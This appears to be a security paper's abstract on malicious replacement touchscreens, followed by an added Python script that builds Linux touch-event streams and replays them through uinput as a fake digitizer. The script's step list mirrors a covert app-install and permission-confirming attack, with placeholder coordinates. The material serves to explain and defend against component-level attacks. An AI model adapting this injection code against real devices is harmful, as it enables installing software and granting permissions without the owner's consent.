Abstract: Phone touchscreens, and similar hardware components such as orientation sensors, wireless charging controllers, and NFC readers, are often produced by third-party manufacturers rather than by the phone vendors themselves. The third-party driver source code that supports these components is integrated into the vendor's own source tree. Unlike "pluggable" drivers, such as USB or network drivers, which must cope with devices that can be attached at any time, a component driver implicitly assumes that the component hardware is authentic and trustworthy. As a result of this trust, very few integrity checks are performed on the communication between the component and the device's main processor. In this paper, we call this trust into question, considering that touchscreens are frequently shattered and then replaced with aftermarket components of questionable origin.
The first attack we demonstrate is a malicious software installation attack. As illustrated in the video, the malicious touchscreen injects a sequence of touches that opens the Google Play Store, installs an app, and starts it. Rather than hunting for the Play Store icon on screen, the injected touches use Android's built-in search to type the app's name, which makes the attack robust against users who customize their home screens. It is important to note that the installed app can be granted arbitrary rights and permissions, because the malicious touchscreen can confirm any security prompt the operating system raises. The whole attack takes less than 30 seconds, and it can be carried out while the phone is unattended and the screen is powered off.
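To make the trust gap concrete, the following is an added example, not code from the paper or its authors: it models the event stream a touch driver hands to the Linux input core for a sequence of taps (multitouch protocol type B, as used by Android touch drivers), and optionally replays that stream through /dev/uinput so the rest of a Linux system treats it as genuine finger input. The paper's attack originates in replaced hardware on the touchscreen bus; synthesizing the same kind of stream from software simply lets the reader observe that nothing downstream of the driver can distinguish the two. The tap coordinates, the device name, and the vendor/product IDs are placeholders, the step list mirrors the UI steps described above, and `inject()` assumes a 64-bit Linux host with write access to /dev/uinput (normally root).

```python
"""Touch-event stream as seen by the Linux input core, plus uinput replay.

Added example: models what an untrusted digitizer's driver emits; not the
paper's hardware or code. Requires a 64-bit Linux host for inject().
"""
import os
import struct
import time

# Event types and codes from include/uapi/linux/input-event-codes.h
EV_SYN, EV_KEY, EV_ABS = 0x00, 0x01, 0x03
SYN_REPORT = 0x00
BTN_TOUCH = 0x14A
ABS_MT_SLOT, ABS_MT_POSITION_X = 0x2F, 0x35
ABS_MT_POSITION_Y, ABS_MT_TRACKING_ID = 0x36, 0x39

# struct input_event on a 64-bit host: timeval (2 x long), type, code, value
INPUT_EVENT = struct.Struct("llHHi")


def touch_events(x, y, tracking_id=0):
    """Triples for one finger-down / finger-up tap at (x, y), protocol type B.

    Two frames, each closed by SYN_REPORT: the contact arrives in slot 0,
    then the contact leaves (tracking id -1)."""
    return [
        (EV_ABS, ABS_MT_SLOT, 0),
        (EV_ABS, ABS_MT_TRACKING_ID, tracking_id),
        (EV_ABS, ABS_MT_POSITION_X, x),
        (EV_ABS, ABS_MT_POSITION_Y, y),
        (EV_KEY, BTN_TOUCH, 1),
        (EV_SYN, SYN_REPORT, 0),
        (EV_ABS, ABS_MT_SLOT, 0),
        (EV_ABS, ABS_MT_TRACKING_ID, -1),
        (EV_KEY, BTN_TOUCH, 0),
        (EV_SYN, SYN_REPORT, 0),
    ]


def encode(events, sec=0, usec=0):
    """Pack triples into the raw bytes an evdev reader receives. The timestamp
    is whatever the sender claims; there is no authentication of any field."""
    return b"".join(INPUT_EVENT.pack(sec, usec, t, c, v) for t, c, v in events)


def decode(raw):
    """Inverse of encode(): raw evdev bytes back to (type, code, value)."""
    return [(t, c, v) for _, _, t, c, v in INPUT_EVENT.iter_unpack(raw)]


# Hypothetical tap targets for the steps described in the text. Real values
# depend on screen resolution, launcher layout and keyboard layout.
ATTACK_STEPS = [
    ("open launcher search", 540, 300),
    ("tap a letter of the app name on the on-screen keyboard", 150, 1700),
    ("tap the Play Store result", 540, 500),
    ("tap Install", 900, 800),
    ("confirm the permission prompt", 900, 1500),
]


def attack_stream():
    """One tap per step, each with its own tracking id, as one event stream."""
    events = []
    for i, (_, x, y) in enumerate(ATTACK_STEPS):
        events += touch_events(x, y, tracking_id=i)
    return events


# uinput ioctls from include/uapi/linux/uinput.h (_IOW('U', n, int) / _IO('U', n))
UI_SET_EVBIT, UI_SET_KEYBIT, UI_SET_ABSBIT = 0x40045564, 0x40045565, 0x40045567
UI_DEV_CREATE, UI_DEV_DESTROY = 0x5501, 0x5502
BUS_I2C, ABS_CNT = 0x18, 0x40


def inject(events, path="/dev/uinput", width=1080, height=1920, delay=0.05):
    """Register a fake I2C touchscreen and replay events through it."""
    import fcntl  # Linux-only; imported here so the module loads elsewhere
    fd = os.open(path, os.O_WRONLY | os.O_NONBLOCK)
    try:
        for ev in (EV_SYN, EV_KEY, EV_ABS):
            fcntl.ioctl(fd, UI_SET_EVBIT, ev)
        fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOUCH)
        for code in (ABS_MT_SLOT, ABS_MT_POSITION_X, ABS_MT_POSITION_Y, ABS_MT_TRACKING_ID):
            fcntl.ioctl(fd, UI_SET_ABSBIT, code)
        absmax, zeros = [0] * ABS_CNT, [0] * ABS_CNT
        absmax[ABS_MT_SLOT], absmax[ABS_MT_TRACKING_ID] = 9, 0xFFFF
        absmax[ABS_MT_POSITION_X], absmax[ABS_MT_POSITION_Y] = width - 1, height - 1
        # struct uinput_user_dev: name[80], input_id, ff_effects_max, absmax/min/fuzz/flat[64]
        setup = struct.pack("80sHHHHI" + "64i" * 4, b"aftermarket-digitizer",
                            BUS_I2C, 0x1234, 0x5678, 1, 0, *absmax, *zeros, *zeros, *zeros)
        os.write(fd, setup)
        fcntl.ioctl(fd, UI_DEV_CREATE)
        time.sleep(0.5)  # let the input core and userspace notice the new device
        for t, c, v in events:
            now = time.time()
            os.write(fd, INPUT_EVENT.pack(int(now), int((now % 1) * 1e6), t, c, v))
            if t == EV_SYN:
                time.sleep(delay)
    finally:
        fcntl.ioctl(fd, UI_DEV_DESTROY)
        os.close(fd)


if __name__ == "__main__":
    inject(attack_stream())
```

Running the module on a Linux desktop with root produces five clicks at the placeholder coordinates, attributed to a device that claims to sit on the I2C bus; libinput, X11 or Wayland accept them exactly as they would accept a real digitizer's reports. That is the point of the abstract: every field in the stream, including the timestamp and the device identity, is asserted by the sender, so an integrity check would have to live on the bus between the main processor and the component, not anywhere above the driver.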